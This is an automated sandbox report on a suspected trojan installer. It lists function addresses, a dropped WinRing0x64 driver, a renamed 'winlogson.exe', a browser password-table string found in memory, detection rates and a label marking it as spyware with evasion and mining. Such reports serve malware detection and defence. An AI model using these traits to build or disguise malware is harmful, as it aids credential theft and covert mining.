Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00424030 2_2_00424030
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004328D1 2_2_004328D1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004368D6 2_2_004368D6
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00436881 2_2_00436881
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041F888 2_2_0041F888
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004288A0 2_2_004288A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00427160 2_2_00427160
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00446960 2_2_00446960
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00443910 2_2_00443910
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00425920 2_2_00425920
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041312E 2_2_0041312E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004381D0 2_2_004381D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040A1E0 2_2_0040A1E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004249E0 2_2_004249E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00431197 2_2_00431197
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042E9A0 2_2_0042E9A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00408A10 2_2_00408A10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042CA20 2_2_0042CA20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044A220 2_2_0044A220
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00430A2A 2_2_00430A2A
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043E230 2_2_0043E230
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043AAC1 2_2_0043AAC1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00402AD0 2_2_00402AD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043BAD0 2_2_0043BAD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044A350 2_2_0044A350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040DB0D 2_2_0040DB0D
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00439B19 2_2_00439B19
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00441B30 2_2_00441B30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004243C0 2_2_004243C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044AC60 2_2_0044AC60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044B470 2_2_0044B470
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00409400 2_2_00409400
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00424CC0 2_2_00424CC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040CCD0 2_2_0040CCD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041ACD0 2_2_0041ACD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042CCD0 2_2_0042CCD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040C4E0 2_2_0040C4E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044A4E0 2_2_0044A4E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004034F0 2_2_004034F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043DC80 2_2_0043DC80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042C486 2_2_0042C486
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041FC88 2_2_0041FC88
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0040FCB0 2_2_0040FCB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041D4B8 2_2_0041D4B8
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00416D43 2_2_00416D43
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00444542 2_2_00444542
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044A570 2_2_0044A570
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00407D30 2_2_00407D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00446D30 2_2_00446D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042FDCC 2_2_0042FDCC
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00420580 2_2_00420580
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00430585 2_2_00430585
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042ED90 2_2_0042ED90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00441D90 2_2_00441D90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043E5B0 2_2_0043E5B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00417671 2_2_00417671
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00435674 2_2_00435674
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0044A610 2_2_0044A610
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041CED3 2_2_0041CED3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00408E80 2_2_00408E80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00403E90 2_2_00403E90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0042CE91 2_2_0042CE91
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00432E9E 2_2_00432E9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004436AA 2_2_004436AA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00428EB0 2_2_00428EB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043DF50 2_2_0043DF50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00404772 2_2_00404772
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00431775 2_2_00431775
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043B710 2_2_0043B710
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00431FCA 2_2_00431FCA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_004367DA 2_2_004367DA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00435F88 2_2_00435F88
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041DF8F 2_2_0041DF8F
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041EF9E 2_2_0041EF9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041E7AF 2_2_0041E7AF
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0043F7B0 2_2_0043F7B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA28C0 2_2_00CA28C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C950E0 2_2_00C950E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA00E0 2_2_00CA00E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9A0F0 2_2_00C9A0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD90F0 2_2_00CD90F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CEB0F0 2_2_00CEB0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8C890 2_2_00C8C890
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC6090 2_2_00CC6090
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA98A0 2_2_00CA98A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC78A0 2_2_00CC78A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD98B0 2_2_00CD98B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C93840 2_2_00C93840
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9F860 2_2_00C9F860
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBC870 2_2_00CBC870
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBD070 2_2_00CBD070
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C81000 2_2_00C81000
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE2800 2_2_00CE2800
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9D810 2_2_00C9D810
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD6010 2_2_00CD6010
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CAE020 2_2_00CAE020
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8E030 2_2_00C8E030
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBE9C0 2_2_00CBE9C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C841D0 2_2_00C841D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE41D0 2_2_00CE41D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8D1E0 2_2_00C8D1E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C88990 2_2_00C88990
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9F190 2_2_00C9F190
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C901A0 2_2_00C901A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C989A0 2_2_00C989A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C96940 2_2_00C96940
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C99150 2_2_00C99150
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8B960 2_2_00C8B960
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB7170 2_2_00CB7170
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CED90A 2_2_00CED90A
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9E900 2_2_00C9E900
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB0110 2_2_00CB0110
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD4110 2_2_00CD4110
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD6920 2_2_00CD6920
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB8130 2_2_00CB8130
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CF22CA 2_2_00CF22CA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB22F0 2_2_00CB22F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA3A90 2_2_00CA3A90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA5290 2_2_00CA5290
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C97AA0 2_2_00C97AA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB8AA0 2_2_00CB8AA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C982B0 2_2_00C982B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE12B0 2_2_00CE12B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE7AB0 2_2_00CE7AB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C87240 2_2_00C87240
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB3A50 2_2_00CB3A50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC8A70 2_2_00CC8A70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA3200 2_2_00CA3200
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD1A00 2_2_00CD1A00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE2210 2_2_00CE2210
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE3A20 2_2_00CE3A20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CF8230 2_2_00CF8230
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC93D0 2_2_00CC93D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE93E0 2_2_00CE93E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CAABF0 2_2_00CAABF0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9DB80 2_2_00C9DB80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C90B90 2_2_00C90B90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C91BA0 2_2_00C91BA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9E3A0 2_2_00C9E3A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB53A0 2_2_00CB53A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD7BB0 2_2_00CD7BB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CCEB40 2_2_00CCEB40
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C97B50 2_2_00C97B50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CCA350 2_2_00CCA350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD0350 2_2_00CD0350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA9360 2_2_00CA9360
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8A300 2_2_00C8A300
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C87B00 2_2_00C87B00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C88310 2_2_00C88310
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9B310 2_2_00C9B310
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA7320 2_2_00CA7320
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC1320 2_2_00CC1320
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CDBCC0 2_2_00CDBCC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD84C0 2_2_00CD84C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CEA4C0 2_2_00CEA4C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C854D0 2_2_00C854D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC4CB0 2_2_00CC4CB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C92450 2_2_00C92450
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA5450 2_2_00CA5450
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC6460 2_2_00CC6460
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9EC70 2_2_00C9EC70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB3C70 2_2_00CB3C70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA2C00 2_2_00CA2C00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE1C00 2_2_00CE1C00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C94C10 2_2_00C94C10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C9D410 2_2_00C9D410
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB3410 2_2_00CB3410
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C94430 2_2_00C94430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C90430 2_2_00C90430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD3430 2_2_00CD3430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA55C0 2_2_00CA55C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C88DD0 2_2_00C88DD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBF5D0 2_2_00CBF5D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB7DD0 2_2_00CB7DD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C90DE0 2_2_00C90DE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC7DF0 2_2_00CC7DF0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00D05592 2_2_00D05592
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA2D80 2_2_00CA2D80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBC5A0 2_2_00CBC5A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8CD50 2_2_00C8CD50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBB560 2_2_00CBB560
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE3D60 2_2_00CE3D60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA9D00 2_2_00CA9D00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CDFD00 2_2_00CDFD00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD9500 2_2_00CD9500
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C93510 2_2_00C93510
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBFD20 2_2_00CBFD20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C89D30 2_2_00C89D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C96530 2_2_00C96530
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA3530 2_2_00CA3530
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C976C0 2_2_00C976C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBAEC0 2_2_00CBAEC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CBD6E0 2_2_00CBD6E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CB86E0 2_2_00CB86E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CCAEE0 2_2_00CCAEE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8B6F0 2_2_00C8B6F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA66F0 2_2_00CA66F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC2E80 2_2_00CC2E80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C89690 2_2_00C89690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8E690 2_2_00C8E690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD5690 2_2_00CD5690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC3EA0 2_2_00CC3EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C816B0 2_2_00C816B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA5EB0 2_2_00CA5EB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE4640 2_2_00CE4640
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC9650 2_2_00CC9650
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8DE60 2_2_00C8DE60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE9E60 2_2_00CE9E60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8C610 2_2_00C8C610
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA0E10 2_2_00CA0E10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CE7E10 2_2_00CE7E10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C90620 2_2_00C90620
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CAFE20 2_2_00CAFE20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA6FC0 2_2_00CA6FC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD2FC0 2_2_00CD2FC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C827E0 2_2_00C827E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CD07F0 2_2_00CD07F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CC6F90 2_2_00CC6F90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CDFF90 2_2_00CDFF90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C99740 2_2_00C99740
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA1F50 2_2_00CA1F50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00D03718 2_2_00D03718
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C8BF10 2_2_00C8BF10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CA2F10 2_2_00CA2F10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00C93F20 2_2_00C93F20
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Code function: 10_2_054BF2E4 10_2_054BF2E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04E1B570 13_2_04E1B570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04E1B550 13_2_04E1B550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08AB3F20 13_2_08AB3F20
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: String function: 0041ACC0 appears 85 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: String function: 00CEDE10 appears 97 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: String function: 00CF607C appears 44 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: String function: 0040B1D0 appears 47 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: String function: 00CFAE24 appears 34 times
One or more processes crash
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704
PE file contains more sections than normal
Source: winlogson.exe.10.dr Static PE information: Number of sections : 11 > 10
PE file does not import any functions
Source: winlogson.exe.10.dr Static PE information: No import functions for PE file found
PE file overlay found
Source: winlogson.exe.10.dr Static PE information: Data appended to the last section found
Sample file is different than original file name gathered from version info
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
Uses 32bit PE files
Source: setupx 1.exe1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setupx 1.exe1.exe Static PE information: Section: .bss ZLIB complexity 1.0003259892086331
Source: setupx 1.exe1.exe Static PE information: Section: .bss ZLIB complexity 1.0003259892086331
Source: WinRing0x64.sys.10.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@33/17@2/3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00442800 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 2_2_00442800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Mutant created: \Sessions\1\BaseNamedObjects\ProgramV3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6676
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Jump to behavior
Source: setupx 1.exe1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: setupx 1.exe1.exe, 00000002.00000003.1035882521.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1058083015.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1036366767.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1057734750.00000000037C2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: setupx 1.exe1.exe Virustotal: Detection: 65%
Source: setupx 1.exe1.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File read: C:\Users\user\Desktop\setupx 1.exe1.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
